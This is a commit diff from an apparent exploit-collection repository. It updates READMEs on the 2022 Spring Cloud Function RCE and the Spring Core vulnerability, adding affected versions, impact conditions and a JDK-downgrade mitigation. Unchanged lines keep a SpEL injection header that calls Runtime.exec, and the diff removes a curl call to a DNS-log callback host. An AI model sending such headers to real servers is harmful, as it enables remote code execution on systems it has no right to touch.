admin/0day
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

update readme

Browse Source
This commit is contained in:
helloexp 2022-03-30 11:51:46 +08:00
parent eb33112b95
commit 2670bf1b6b
2 changed files with 11 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

10
21-Spring Cloud/Spring Cloud Function RCE/README.md
View File

@ -7,6 +7,10 @@ header
``` ```
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app") spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")
``` ```
## 受影响吧版本
SpringCloudFunction 3 <= 漏洞版本 <= 3.2.2
# build # build
```bash ```bash
wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zip
@ -61,11 +65,5 @@ Content-Length: 5
helloexp helloexp
``` ```
## check
```bash
curl -v 'https://helloexp.com/dnslog?q=random87535.rce.helloexp.com'
```
## official GitHub info ## official GitHub info
https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f https://github.com/spring-cloud/spring-cloud-function/commit/0e89ee27b2e76138c16bcba6f4bca906c4f3744f

6
22-Spring Core/README.md
View File

@ -9,3 +9,9 @@
## Spring 官方补丁也正在积极的赶制中 ## Spring 官方补丁也正在积极的赶制中
[Spring 制作中的补丁链接](https://github.com/spring-projects/spring-framework/commit/7f7fb58dd0dae86d22268a4b59ac7c72a6c22529) [Spring 制作中的补丁链接](https://github.com/spring-projects/spring-framework/commit/7f7fb58dd0dae86d22268a4b59ac7c72a6c22529)
## 漏洞影响
1. jdk 版本在9及以上的
2. 使用了Spring Framework或衍生框架
## 漏洞修复建议
目前Spring 官方暂未发布补丁建议降低jdk 版本作为临时方案